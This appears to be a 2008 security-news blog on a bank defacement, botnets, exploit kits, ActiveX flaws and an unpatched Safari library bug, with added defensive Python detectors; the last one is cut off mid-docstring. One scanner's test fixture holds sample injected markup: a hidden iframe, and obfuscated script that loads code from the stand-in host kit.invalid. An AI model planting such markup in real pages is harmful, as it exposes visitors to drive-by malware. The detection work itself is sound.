This should also show the world how confident malware authors are about evading AV detection. They are willing to send in their own program...just to screw their client - since they can easily modify it to evade detection again right afterwards.
Hackers have managed to shut down the Bank of Israel for two whole days, taking advantage of the Jewish festival of Passover, when senior staff members were out of the office.
According to Israeli newspaper Globes, who were first to alert the bank to the fact that they’d been attacked, hackers managed to scrawl "Hear me Jews, you're a nation whose fate is sealed and sooner or later you will lose in war."
The Bank of Israel was quick to close the site until it could get a handle on who exactly was behind the attack, and what damage they had done. The Bank also said that it was 'temporarily closed', but that might just be because its lazy and patently hopeless security staff wanted to stretch the long weekend out a bit further.
Globes reported that the text went on to say "Victory will come, inshallah (God willing) and the scenario of Chechnya will be repeated and we will drive you out. Millions of young Muslims are willing to die for al-Quds (Jerusalem), which belongs to us."
Globes was apparently told by its sources in the bank that financial reports going as far up as October 2007 had been deleted from the bank’s systems, but Bank of Israel spokesman, Yossi Saadon, said that the problem was 'being dealt with' and that the 'incident has no effect on the bank's internal systems'.
He added that all transactions were protected in such a way that there was no conceivable way that anyone could have hacked into the actual data systems from the Internet. He hopes.
Algeria is the top suspect but not the only one. Some Israelis think that Hizbullah is much more likely to be behind the attack, or Qatar, or even Palestinians from Gaza. But seeing as most of these groups tend to blow things up as a way of expressing themselves, the bank hack seems a tad too articulate.
The bank will be open for business again once the remaining questions about the embarrassing hack have been answered. Or just as soon as the bank’s employees can be bothered to drag themselves back to the office. Probably the latter.
Leading security software vendor PC Tools revealed that it has identified a new variant of the Kraken bot, also known as Bobax, and has disclosed the source code of its key component. The new variant employs new techniques to evade detection, which makes this latest Kraken bot a significant threat.
“PC Tools are revealing the details of the latest Kraken variant including the new list of domain names as well as the mathematical algorithm used. The source code of the Kraken domain name generation algorithm is disclosed in the interests of congregating all the knowledge about this bot so that other security specialists can benefit from it,” said Sergei Shevchenko, Senior Malware Researcher, PC Tools. “The more collective knowledge security vendors have over this threat, the greater the chance the industry has of defeating it,” said Shevchenko.
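The article gives neither the Kraken algorithm nor the published domain list, so what follows is an added example of the defensive side of this story, not PC Tools' code and not the Kraken/Bobax generator itself: a small Python scorer that flags DNS query names whose registrable label looks pseudo-random, which is how domain-generation output typically stands out in resolver logs. The SUFFIXES table, the KNOWN_DGA_DOMAINS set and the SAMPLE_LOG lines are constructed stand-ins.

```python
"""Flag DNS query names whose registrable label looks machine-generated.

Added example, not PC Tools' code; the Kraken/Bobax algorithm and the domain
list mentioned in the article are not reproduced here.  Two cheap statistics
separate dictionary-like labels from pseudo-random ones: Shannon entropy of
the label and its longest run of consonants.  SUFFIXES, KNOWN_DGA_DOMAINS and
SAMPLE_LOG are constructed stand-ins.
"""
import math
import re
from collections import Counter

# Tiny stand-in for a public-suffix list (constructed).
SUFFIXES = ("co.uk", "com", "net", "org", "uk")
# 'y' is left out on purpose so that words like "system" are not penalised.
CONSONANT_RUN = re.compile(r"[bcdfghjklmnpqrstvwxz]+")
ENTROPY_THRESHOLD = 3.0   # bits per character
RUN_WITH_ENTROPY = 4      # consonant run needed when entropy is also high
RUN_ALONE = 6             # consonant run that is suspicious on its own
# Constructed placeholder; a real feed would hold the vendor's published list.
KNOWN_DGA_DOMAINS = {"hgtrbzqwv.com"}

# Constructed resolver log: "<timestamp> <client> <qname>".
SAMPLE_LOG = """\
2008-04-25T10:00:01 10.0.0.5 www.example.com
2008-04-25T10:00:02 10.0.0.5 update.microsoft.com
2008-04-25T10:00:03 10.0.0.7 xkqzvbtrwplmn.net
2008-04-25T10:00:04 10.0.0.7 hgtrbzqwv.com
2008-04-25T10:00:05 10.0.0.9 news.bbc.co.uk
2008-04-25T10:00:06 10.0.0.7 pqmzxlrtvk.org
"""


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def max_consonant_run(text):
    """Length of the longest unbroken run of consonants in `text`."""
    return max((len(m) for m in CONSONANT_RUN.findall(text)), default=0)


def registrable_label(qname):
    """Return (label, registrable_domain) for a query name.

    "news.bbc.co.uk" -> ("bbc", "bbc.co.uk"); falls back to the last two
    labels when no known suffix matches.
    """
    qname = qname.lower().rstrip(".")
    for suffix in sorted(SUFFIXES, key=lambda s: -s.count(".")):
        if qname.endswith("." + suffix):
            label = qname[: -len(suffix) - 1].split(".")[-1]
            return label, label + "." + suffix
    labels = qname.split(".")
    if len(labels) >= 2:
        return labels[-2], ".".join(labels[-2:])
    return qname, qname


def classify(qname):
    """Return a reason string if `qname` looks like DGA output, else None."""
    label, domain = registrable_label(qname)
    if domain in KNOWN_DGA_DOMAINS:
        return "listed"
    entropy = shannon_entropy(label)
    run = max_consonant_run(label)
    if (entropy >= ENTROPY_THRESHOLD and run >= RUN_WITH_ENTROPY) or run >= RUN_ALONE:
        return "heuristic(entropy=%.2f, consonant_run=%d)" % (entropy, run)
    return None


def analyze_log(log_text):
    """Return [(qname, reason)] for every flagged line of a resolver log."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        reason = classify(parts[2])
        if reason:
            flagged.append((parts[2], reason))
    return flagged


if __name__ == "__main__":
    for qname, reason in analyze_log(SAMPLE_LOG):
        print(qname, reason)
```

Entropy alone rises with label length, so it is paired with the consonant-run test to keep long dictionary words such as "microsoft" from being flagged; on real traffic the suffix tuple would be replaced by a public-suffix list and the placeholder set by the vendor's published domains, and the listed-domain check is the one that actually identifies this bot, the heuristic only catching names that look like it.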
by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
If a user visits the malicious page the attacker can execute code.
Coded by callAX
According to Secunia, HP has addressed the vulnerabilities in 4.000.010.008 (see HP advisory for details).
Friday, April 25, 2008
The Anti-Spyware Coalition has launched a review of Phorm, NebuAd, and other behavioral targeting firms that track user data from inside the world's ISPs.
Today, the ASC - a collection of anti-spyware companies, academics, and various consumer advocates - announced a new internal working group to decide how Phorm and the Phormettes will affect the organization's overarching policies on spyware.
These policies serve as guidelines for the leading anti-spyware apps. "We update our documents when new potential threats and new potentially unwanted technologies emerge," says Ari Schwartz, the vice president and chief operating officer at the Center for Democracy and Technology, which first organized the ASC. "Some [anti-spyware companies] have said that behavioral advertising is a gray area when it comes to the ASC definitions. And if some people think this is a gray area, it's something we need to look at."
Through partnerships with ISPs on both sides of the Atlantic, companies such as Phorm, NebuAd, and Front Porch track search and browsing activity in an effort to target online ads. Phorm and NebuAd serve up ads on their own, while Front Porch licenses its data to third-party ad networks.
In some cases, anti-spyware tools already flag the ad-server cookies laid down by the likes of Phorm and NebuAd - as well as cookies used by Front Porch partners. The big question is how the cookies should be flagged.
"We need to go into detail on how the consent factors work here. Does someone clearly know they're being tracked or not?" Schwartz says. "We must determine what level of risk is tied to these things."
All three of these behavioral ad firms insist the data they collect includes no personally identifiable information. But it's unclear whether users are properly notified before these services are turned on.
NebuAd says that ISP partners are required to "directly notify" users via letter or email, but this hasn't always happened in the past. In some cases, Front Porch notifies users with a conspicuous in-browser message. But in other cases, it does not.
Phorm hasn't officially rolled out its service, but it has agreements with BT, Carphone Warehouse, and Virgin in the UK (though Virgin insists this does not mean it will actually use the service). Carphone has said it will ask for user consent before turning Phorm on, but the others have not. In 2006 and 2007, Phorm conducted trials on BT's network without telling customers diddly.
Other operations that appear to be working on similar services include a Bay Area company called Adzilla; and Project Rialto, a "stealth company" created by Alcatel-Lucent, but these firms have not responded to our interview requests.
BEIJING — China appeared to bend to international pressure on Friday as the government announced it would meet with envoys of the Dalai Lama, an unexpected shift that comes as violent Tibetan demonstrations in western China have threatened to cast a pall over the Beijing Olympics in August.
China’s announcement, made through the country’s official news agency, provided few details about the shape or substance of the talks but said the new discussions would commence “in the coming days.” The breakthrough comes as Chinese officials have pivoted this week and moved to tamp down the domestic nationalist anger unleashed by the Tibetan crisis and by the protests at the international Olympic torch relay.
“In view of the requests repeatedly made by the Dalai side for resuming talks, the relevant department of the central government will have contact and consultation with Dalai’s private representative in the coming days,” said an unidentified Chinese official, according to Xinhua, the official news agency.
The Dalai Lama, the exiled Tibetan spiritual leader, was returning to India from the United States on Friday. He has repeatedly called for renewed talks with Chinese officials and last month sent a letter to China’s president, Hu Jintao. Earlier this month, he hinted in Seattle that a back-channel discussion was already under way. On Friday, his spokesman, Tenzin Taklha, said: “Since His Holiness is committed to dialogue, we would welcome this.”
The spokesman added that the Dalai Lama had not yet received any official communication from China. “We also have to look at when the offer does officially arrive,” he said from Dharamshala, India, the seat of the Tibetan government-in-exile. “We have to look at conditions they are talking about.”
The UN's nuclear watchdog has said it will investigate US claims that Syria was building a secret nuclear reactor with North Korean help.
The International Atomic Energy Agency criticised the US for withholding its intelligence until seven months after Israel bombed the site.
The US said the alleged Syrian reactor "was not for peaceful purposes".
Syria has said the US claim is "ridiculous" and has denied any nuclear links to North Korea.
The site of the alleged reactor, said to be like one in North Korea, was bombed by Israel in 2007.
The director general of the UN's International Atomic Energy Agency (IAEA), Mohamed ElBaradei, has now been briefed by the US on their claims but "deplores" the delay, a statement from the agency said.
"The agency will treat this information with the seriousness it deserves and will investigate the veracity of the information," the statement said.
The agency was critical of both the US delay in releasing the information and of Israel's bombing of the site before the IAEA could inspect it.
"The director general views the unilateral use of force by Israel as undermining the due process of verification that is at the heart of the non-proliferation regime," the statement said.
The statement is a clear indication that Mr ElBaradei is not accepting the US claims at face value and wants his own first-hand information, says BBC diplomatic correspondent Bridget Kendall.
Syrian officials have said the site that was bombed by Israel on 6 September 2007 was an unused military facility under construction. Building on the site had stopped some time before the air strike, the Syrians said.
On Thursday, American security officials showed members of Congress evidence they said proved Syria was building a nuclear reactor with North Korean assistance.
Among the evidence they displayed were pictures - said to have been obtained by Israel - allegedly taken inside the facility showing the reactor core being built.
The images showed striking similarities between the Syrian facility and the North Korean reactor at Yongbyon, the US said.
Percentage of Chinese population using the Internet is lower than global average
China is one of the most heavily populated countries in the world, but it also has a large proportion of poor citizens without access to technology. Because of the huge number of Chinese citizens, the number of internet users in China is growing rapidly.
The Chinese government commonly censors the Internet and has only recently begun allowing Chinese citizens to have access to English-language websites. According to numbers released by the Chinese Ministry of Information, China now has 221 million internet users. This number is up significantly from the end of 2007, when China reported 210 million internet users.
At the end of 2007 the U.S. had 205 million internet users. The Chinese Xinhua News Agency quoted the Chinese Information Ministry as saying, “Despite rapidly increasing the Internet population, the proportion of Internet users among the total population is still lower than the global average level.”
The global average for percentage of Internet users in a country is 19.1%; China only has an average of 16%. Chinese authorities expect to have 280 million internet users by the end of 2008.
The internet is an outlet for Chinese citizens to voice opinions in a country where traditional news media is strictly controlled. The lack of control over the internet compared to the control China exerts on other forms of media led Chinese President Hu Jintao to call for a purification of the internet in 2007.
Yeah, I mean, what would happen if normal everyday citizens were allowed to have a voice and express it via the Internet? Chaos, that's what. Clearly.
Discovery date : 21 April 2008
Remote : Yes
Credits : J. Bachmann & B. Mariani from ilion Research Labs
Vulnerable : Zune software: EncProfile2 Class
An arbitrary file overwrite has been discovered in an ActiveX control installed with the Zune software package.
If a user visits the malicious page and authorizes the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.
Sophisticated peer-to-peer (P2P) botnets like Storm that have no centralized command and control architecture have frustrated researchers because they're tough to dismantle. But a group of European researchers has come up with a way to disrupt these stealthy botnets -- by “polluting” them.
The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet’s P2P protocol to inject “polluted” content into the botnet to disrupt communication among the bots, as well as to study them more closely. The researchers tested their pollution method out on Storm -- and it worked. They presented their research this month at Usenix.
This is an awesome idea. But it won't be long until botnets are designed to protect their traffic a bit better - cat & mouse.
About 3,000 years ago Thursday, some Greeks left the people of Troy a wooden horse at the walled city’s front gate -- a free gift, no cost, no obligation from would-be invaders who wanted their adversaries to think they had left in peace.
Accepting the Trojan horse at face value turned out to be a big mistake.
Some things never change. In the 21st century Trojan horses are made of electronic "1s" and "0s" but are still left for you in all innocence and in plain sight: your e-mail inbox, in IMs and on a web page. But the intent, and the outcome, is pretty much the same: to pillage and steal.
The computer security industry describes computer Trojans as any program that purports to be one thing -- a screensaver or a .pdf file or a video codec -- but which actually conceals a malicious payload, like a password logger or pop-up advertising software.
One might be tempted to think we've gotten smarter in the three millennia since the Trojans ignored Cassandra's warning and accepted the first one. But when it comes to a propensity to fall for a deal that is too good to be true, humans have made little progress.
Or none whatsoever, if you believe computer-security guru Peter Neumann.
"People are still just as stupid now as they were then," says Neumann, the chief scientist at SRI's computer-security lab. "They see something shiny or a website that offers something for free and then they are dead."
But don’t expect technology to save you from yourself any time soon, Neumann warns.
Human: You are the weakest link. Goodbye.
Man, that tiny Eee PC can be used for just about anything: surfing the web, blogging, surreptitiously hiding inside an ATM machine and stealing your identity. You know, the usual stuff. Yeah, so three creative Brazilian thieves were recently caught stuffing a black Eee into an ATM, where it replaced the ordinary magical-money-making workings and instead stole unwitting customers' card numbers and PINs. The thieves didn't stop there, however -- they purposefully damaged all the other nearby ATMs so that theirs would be the only one in service. Clever! Of course, that doesn't explain why it was so easy to crack open the target ATM in the first place -- we'd pretty much consider our cash flow problems solved if we could pull that trick.
A US court has ruled that users have a "reasonable expectation of privacy" in their internet surfing records and that police must obtain warrants from higher than usual courts in order to force ISPs to hand over records.
The Supreme Court of the state of New Jersey said that information about a person's use of the internet was so private that police there cannot order ISPs to release surfing details of suspects with a municipal court subpoena. They must receive a grand jury subpoena, it said.
"The court holds that citizens have a reasonable expectation of privacy in the subscriber information they provide to internet service providers," said the court's ruling. "Law enforcement officials can obtain subscriber information by serving a grand jury subpoena on an Internet service provider without notice to the subscriber."
Chief Justice Rabner said: "Individuals need an ISP address in order to access the internet. However, when users surf the web from the privacy of their homes, they have reason to expect that their actions are confidential. Many are unaware that a numerical IP address can be captured by the websites they visit. More sophisticated users understand that that unique string of numbers, standing alone, reveals little if anything to the outside world. Only an internet service provider can translate an IP address into a user’s name."
The case involved Shirley Reid, who was accused of hacking into her employer's computer system.
After Reid's ISP, Comcast, handed over details of her account, including the IP address from which she accessed the internet, she was found guilty of computer theft in connection with the hacking incident.
Reid overturned that decision on appeal and at the Supreme Court of New Jersey stage, arguing that the evidence should be suppressed.
Reid's lawyers had argued that a person should be informed when a subpoena is issued permitting the release of their telecommunications subscription details so that they can oppose the move. The Supreme Court of New Jersey, though, said that as long as the subpoena is from a grand jury the information can be released without the knowledge or consent of the user.
"Modern technology has raised a number of questions that are intertwined in this case: to what extent can private individuals 'surf' the 'web' anonymously? Do internet subscribers have a reasonable expectation of privacy in their identity while accessing internet websites? And under what circumstances may the State learn the actual identity of internet users?" said Chief Justice Rabner in his ruling.
"We decline to adopt a requirement that notice be provided to account holders whose information is subpoenaed," he said. "For obvious reasons, notice could impede and possibly defeat the grand jury’s investigation. Particularly in the case of computers, unscrupulous individuals aware of a subpoena could delete or damage files on their home computer and thereby effectively shield them from a legitimate investigation."
The court said that although Reid was successful in having the municipal warrant-obtained evidence suppressed, the police were not barred from approaching Comcast again and obtaining the records using an appropriate warrant.
Wednesday, April 23, 2008
Security researchers have discovered a new web-based attack tool which exploits up to 14 browser vulnerabilities and installs malware on the user's system.
Symantec researcher Liam O'Murchu said that 'Tornado' is commonly installed on a server by a single 'administrator', who then offers accounts on the server to other attackers.
The attackers then inject code into other web pages to redirect users to the Tornado server, where the exploit and malware installation is conducted.
"Perhaps this is why the code for this pack has stayed private for so long," said O'Murchu.
"Using this model, the creators of the pack can sell it to a few trusted customers at a higher price, rather than selling it to many untrustworthy customers and risking the code being released in the underground."
Tornado also offers attackers a full set of traffic statistics and options for selecting which exploits can be conducted.
The malware features an option to redirect repeat visitors to a phoney 'account suspended' page.
This helps the tool to evade security researchers who will make repeated visits to infected pages in order to study the exploits and malware in use.
Programs such as Neosploit and MPack offer similar capabilities to set up servers that can conduct multiple exploits against users.
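The injection step described above, attackers planting redirect code in otherwise legitimate pages, is the part a site owner can actually look for. The following is an added example, not Symantec's code and not part of the Tornado kit: a standard-library Python scanner that reports hidden off-site iframes, off-site or obfuscated scripts, script-driven redirects and meta-refresh redirects to any host other than the site's own. The two sample pages and the hosts shop.example and kit.invalid are constructed for the demonstration.

```python
"""Scan a page's HTML for injected redirect code of the kind exploit-kit
operators plant on compromised sites.

Added example, not Symantec's code and not part of the Tornado kit.  Only the
standard library is used.  The hosts shop.example and kit.invalid and the two
sample pages are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Constructs that assemble injected markup instead of writing it plainly.
OBFUSCATION = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\(", re.I)
# location = "http://..."  /  location.href = "..."  /  location.replace("...")
REDIRECT = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"](https?://[^'\"]+)"
    r"|location\.replace\s*\(\s*['\"](https?://[^'\"]+)",
    re.I,
)

# Constructed sample pages for the site shop.example.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/js/app.js"></script></head>
<body><iframe src="http://shop.example/help" width="400" height="300"></iframe>
<script>var cart = []; document.getElementById('total');</script>
</body></html>"""

COMPROMISED_PAGE = """<html><head><title>Shop</title>
<meta http-equiv="refresh" content="5;url=http://kit.invalid/land"></head>
<body><p>Welcome back</p>
<iframe src="http://kit.invalid/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://kit.invalid/x.js%22%3E%3C/script%3E'))</script>
<script>if (document.referrer) { window.location = "http://kit.invalid/go"; }</script>
</body></html>"""


def _tiny(value):
    """True for a width/height attribute of 0 or 1 (pixels)."""
    match = re.match(r"\s*(\d+)", value or "")
    return match is not None and int(match.group(1)) <= 1


class InjectionScanner(HTMLParser):
    """Collect (kind, detail) findings for content that pulls in another host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False
        self._script_body = []

    def _offsite(self, url):
        host = urlparse(url.strip()).hostname
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe":
            src = attrs.get("src") or ""
            hidden = (_tiny(attrs.get("width")) or _tiny(attrs.get("height"))
                      or bool(HIDDEN_STYLE.search(attrs.get("style") or "")))
            if hidden and self._offsite(src):
                self.findings.append(("hidden-offsite-iframe", src))
        elif tag == "script":
            self._in_script = True
            self._script_body = []
            src = attrs.get("src")
            if src and self._offsite(src):
                self.findings.append(("offsite-script", src))
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            match = re.search(r"url\s*=\s*['\"]?([^'\"]+)", attrs.get("content") or "", re.I)
            if match and self._offsite(match.group(1)):
                self.findings.append(("meta-refresh-offsite", match.group(1).strip()))

    def handle_data(self, data):
        if self._in_script:
            self._script_body.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        body = "".join(self._script_body)
        if OBFUSCATION.search(body):
            self.findings.append(("obfuscated-inline-script", body.strip()[:60]))
        for match in REDIRECT.finditer(body):
            url = match.group(1) or match.group(2)
            if self._offsite(url):
                self.findings.append(("script-redirect-offsite", url))


def scan_page(page_html, site_host):
    """Return the list of (kind, detail) findings for one page."""
    scanner = InjectionScanner(site_host)
    scanner.feed(page_html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(name, scan_page(page, "shop.example"))
```

Because a kit like this serves a decoy "account suspended" page to repeat visitors, the scanner is most useful on content captured at first fetch or on the site's own files on disk; re-fetching a suspect URL may only show the decoy.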
The International Atomic Energy Agency says Iran has agreed to cooperate in clarifying whether it has tried to develop nuclear weapons. From Paris, Lisa Bryant reports the Vienna-based IAEA hopes Tehran will provide the information in May.
News of Tehran's agreement to cooperate in clarifying whether or not it has been involved in nuclear-weapons development was provided in a brief statement by the IAEA. The IAEA considers the agreement a positive sign. It comes a day after Iran's government described talks with top IAEA investigator Oli Heinonen in Tehran as positive.
The United States and other western powers believe Iran is trying to build a nuclear weapon, but Tehran says its nuclear activities are for purely peaceful purposes - to generate energy.
Talk about déjà vu....
The government is scrapping a $20 million prototype of its highly touted "virtual fence" on the Arizona-Mexico border because the system is failing to adequately alert border patrol agents to illegal crossings, officials said.
The move comes just two months after Homeland Security Secretary Michael Chertoff announced his approval of the fence built by The Boeing Co. The fence consists of nine electronic surveillance towers along a 28-mile section of border southwest of Tucson.
Boeing is to replace the so-called Project 28 prototype with a series of towers equipped with communications systems, new cameras and new radar capability, officials said.
Less than a week after Chertoff accepted Project 28 on Feb. 22, the Government Accountability Office told Congress it "did not fully meet user needs and the project's design will not be used as the basis for future" developments.
A glaring shortcoming of the project was the time lag between the electronic detection of movement along the border and the transmission of a camera image to agents patrolling the area, the GAO reported.
Although the fence continues to operate, it hasn't come close to meeting the Border Patrol's goals, said Kelly Good, deputy director of the Secure Border Initiative program office in Washington.
"Probably not to the level that Border Patrol agents on the ground thought that they were going to get. So it didn't meet their expectations."
The Border Patrol had little input in designing the prototype but will have more say in the final version, officials said.
Microsoft handed plenty of ammunition to the anti-DRM crowd on Tuesday by announcing it will no longer furnish authorization keys for songs purchased from the defunct MSN Music service.
For former customers of MSN Music--the service Microsoft operated before closing it in late 2006 and opening Zune Marketplace--August 31 will be the last day that they can move music to different computers. After that, Microsoft will no longer "support the retrieval of license keys for the songs you purchased on MSN Music or the authorization of additional computers," the company said in an e-mail to former MSN Music customers.
It's important to note that the music won't disappear after the deadline. Songs will continue to play on authorized computers. What the announcement means is that former MSN Music customers will risk losing their music libraries if they try to transfer songs to unauthorized computers or swap operating systems after Aug. 31.
There are a couple of ways to safeguard the music but they aren't pretty. Before the deadline, those affected can move songs to computers they plan to own for a while (the songs can be authorized to play on five different PCs). Another alternative is to burn songs to CDs and rerip. This means the loss of sound quality but offers more peace of mind.
Bloggers pounced on the news, writing that the situation illustrated just how anti-consumer that digital rights management is. The point most of them made: whatever hardware the songs are stored on will malfunction eventually, and the owner's music (in a high quality form at least) will be gone forever.
"Ultimately, this serves as a reminder of what DRM really is," wrote Justin Mann at TechSpot.com. It's a "way for companies to control your use of their content. Rather than purchasing, you are renting."
Companies work very hard to hide customer-based DRM's true face, but once in a while...it comes shining through....in all its ugliness.
Tuesday, April 22, 2008
Here’s another reason to hold onto your laptops: 57 percent of publicly disclosed security breaches came from lost or stolen equipment in the second half of last year, compared with only 13 percent from hacking and malware, according to Microsoft’s latest Security Intelligence Report, which was released today.
The new Microsoft report, which focuses on vulnerability and exploit data it gathered from July through December of 2007, found that exploits, malware, and hacks made up only 23 percent of security breach notifications between 2000 and 2007.
And the software giant recorded a whopping 300 percent jump in Trojan downloaders and droppers detected in the second half of ’07, as well as a curious 15 percent drop in the disclosure of new vulnerabilities. Overall, vulnerability disclosures decreased by 5 percent for all of 2007.
It was the decrease in vulnerability disclosures that most caught Microsoft by surprise, says Jimmy Kuo, principal architect of the Microsoft Malware Protection Center. “This is the first time since 2003 that there’s been such a decrease,” Kuo says.
The finding also surprised other security experts, including Doug Camplejohn, CEO of Mi5 Networks. But Camplejohn warns that one data point doesn’t make a trend. “It remains to be seen whether there's a true downward trend here, or whether vulnerability discoverers are just being more tight-lipped about vulnerabilities,” Camplejohn says.
In the last day or so we have had a massive influx of users coming to us because they are infected with a file called Chenzi.exe. After analyzing a sample in the lab here, all I can say is, this is pretty insane!
We started off with a clean machine with 56 running processes; after 10 minutes of running, we had ... 318 running processes. I tried to make a video of it, but the machine just couldn't handle it. This file is a downloader for many things at once, one being a password stealer for various online games. We've added detections for the entire cluster of files downloaded from all the downloaders we could get, so it would be worth a go trying to clean this up with Prevx CSI. I'd love to hear some feedback from anyone that's had this infection. Some signs of this infection are constant popups asking you to install Chinese language packs, various Chinese website popups, and your entire right-click menu changing from English to Chinese.
The main goal of this Trojan however is based around stealing WoW accounts, let us know if you have any more info, or have been affected by this threat as it seems rather prevalent at the moment.
In the meantime I'll try and get some video footage up of this infection.
Microsoft Corp. today took credit for crushing the Storm botnet, saying that the malware search-and-destroy tool it distributes to Windows users disinfected so many bots that the hackers threw in the towel.
"They realized they were in our gun sights," said Jimmy Kuo, a principal architect with Microsoft's malware protection center, the group responsible for the Malicious Software Removal Tool (MSRT). Microsoft updates and automatically redistributes the software tool to Windows users each month on Patch Tuesday.
Last year, said Kuo, the criminals behind the Storm Trojan -- malware designed to compromise PCs and add them to a botnet, or collection of infected machines -- tried to keep pace with Microsoft and the MSRT. "They were anticipating our monthly release [of MSRT]," said Kuo, "with new versions that were ready to go immediately before our release."
The bunch controlling the Storm botnet knew that it took Kuo's group several days to create new definitions for the MSRT, and that Microsoft held to a once-a-month release schedule for the tool. And they used that lag time and set schedule to their advantage.
"They knew that it takes [us] a week or more to create new definitions, and they were prepared to update their botnet immediately prior to MSRT releasing," he said, adding that the hackers would get a new version of the Trojan onto already-infected members of the Storm botnet to try to hold on to the machines after Windows had downloaded the newest version of the MSRT.
The idea was to preempt detection by swapping out the Storm bot already on the PC with a version less likely to be identified by the MSRT.
It didn't work, said Kuo. "They found out that even that was a losing battle," he said. "Even though they were able to maintain parts of their botnet, they knew they were in our gun sights. And ultimately they gave up."
According to Kuo, it was the hammering Microsoft gave the Storm botnet that sent the hackers packing.
In the last four months of 2007, the MSRT disinfected more than 526,000 PCs plagued by the Storm bot, he claimed. The bulk of those -- more than 291,000 -- were cleaned in September, when Microsoft first added Storm detection to the MSRT. In October, the number dipped to around 90,000, then bounced back to about 100,000 each month in November and December.
The front-loaded numbers, said Kuo, were typical, since the first month that the MSRT has a new malware definition, the tool cleanses all machines that have ever been infected. In the following months, it can only disinfect PCs that have been infected since the last release of the tool.
Storm, which first appeared in early 2007 -- and got the moniker because it was first disseminated in spam messages that claimed to have news of a massive series of winter storms that swept Europe -- has been linked to the Russian Business Network (RBN), a shadowy network of malware and hacker hosting services once based in St. Petersburg.
Others have confirmed Storm's decline, and credited Microsoft.
Earlier this month, Joe Stewart, the director of malware research at SecureWorks Inc., unveiled research on the world's top 11 botnets, and using SMTP "fingerprinting" and traffic extrapolations, estimated the size of each of those spam-sending botnets. Storm, said Stewart, was No. 5 on that list of 11 and likely controlled about 85,000 PCs -- a far cry from its height in 2007 and about one-fourth as many as the leading botnet, Srizbi.
"Storm is pretty insignificant at this point," Stewart said in an interview two weeks ago. "It got all this attention, so Microsoft added it to its malicious software detection tool [in September 2007], and that's removed hundreds of thousands of compromised PCs from the botnet."
But while Kuo was happy to take the credit on behalf of Microsoft for shrinking Storm, he was realistic about the overall impact.
"What we did was to drive them [the Storm bot herders] elsewhere," he said. "They're probably out there still making money with some other botnet."
When Charlie Miller won US$10,000 for hacking into a Macbook Air laptop last month, he exploited a flaw that had been publicly disclosed nearly a year before the contest.
The flaw, it turns out, lay in an open-source software library called the Perl Compatible Regular Expressions (PCRE) library, which is used by many products including Apache, the PHP scripting language, and Apple's Safari browser, which Miller hacked to win the contest.
Miller won $10,000 and a new Macbook Air last month after hacking into the laptop in a matter of minutes. The PWN2OWN contest invited hackers to try to install unauthorized software on fully patched Mac OS X, Windows and Linux computers using previously undisclosed "zero-day" flaws.
In an e-mail interview, security researcher Chris Evans said he found the bug, which he publicly disclosed in November 2007. PCRE developers fixed the bug months earlier while writing an incomplete fix for the issue in the May 2007 PCRE 6.7 product, Evans said.
Although Apple's Safari browser uses the PCRE software library, the company did not patch its version of the library until late last week. That means that an astute hacker who had noticed the fix in PCRE 6.7 would have been given an early tip on how to hack into Apple's computers.
Discovering a software bug is the first step toward figuring out how to use that flaw in an attack, but not every flaw leads to a successful exploit.
In an e-mail interview, Miller confirmed that the bug he'd exploited was the same one that was patched in PCRE 6.7, but said that researchers at his company, Independent Security Evaluators, had found it "completely independently."
Miller found another PCRE bug that allowed him to be the first hacker to break into the iPhone after it was launched last year.
It is very common for developers to incorporate someone else's software library into their program and then not properly add all the latest bug fixes, said Dragos Ruiu, one of the organizers of the PWN2OWN contest.
However, Apple should have done a better job of staying on top of the software it was shipping. "This is a black mark on their security team, but it's a common problem," he said. The same kind of issue has popped up frequently with products that use the zlib and JPEG compression libraries, he added.
An Apple representative could not immediately comment for this story, saying that he would have to first research the issue.
Ironically, Miller gave a presentation at the Black Hat security conference last year, arguing that one way to find bugs in Mac OS X would be to look for out-of-date open-source software that ships with the Mac and then to scan that project's files.
"I told Apple about this backporting problem then and they didn't listen and I didn't listen either, because we didn't find the bug by looking at changelogs, we found it with source code analysis," Miller said.
Although the focus of the PWN2OWN contest was on zero-day flaws, the fact that Miller exploited a flaw that was unpatched in Apple's products was enough to earn him the prize, conference organizers say.
That's a good thing, because when asked if he planned to return the prize money, Miller shot back the following: "No way. It's not my fault they don't fix their bugs."
This speaks for itself... but clearly, Apple failed to backport an open-source fix into their product. A year later, it is used for pure drive-by download pwnage in its browser.
I have been saying this for some time and so have many, many other security professionals. It is only a matter of time before this exact issue takes a bigger bite of Apple - unless they really crack down and get serious about working open source patches back into their products in a timely fashion.
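The staleness problem described in the PCRE story and in the commentary above (a vendored copy of a library that never received an upstream fix) is something a product team can check for mechanically. The script below is an added example written for this page, not code from Apple, the PCRE project or the article; it walks a tree of vendored third-party sources, pulls each library's version out of its own header and compares it with the minimum version in which a known fix landed. The sample headers it writes are constructed to mimic the real macro layout of `pcre.h` and `zlib.h`; the "6.7" threshold for PCRE is the fix version the article names, and the zlib threshold is an illustrative placeholder, not advisory data.

```python
"""Vendored-library freshness check (added example, not the article's code).

Scans a directory of vendored third-party sources, extracts each library's
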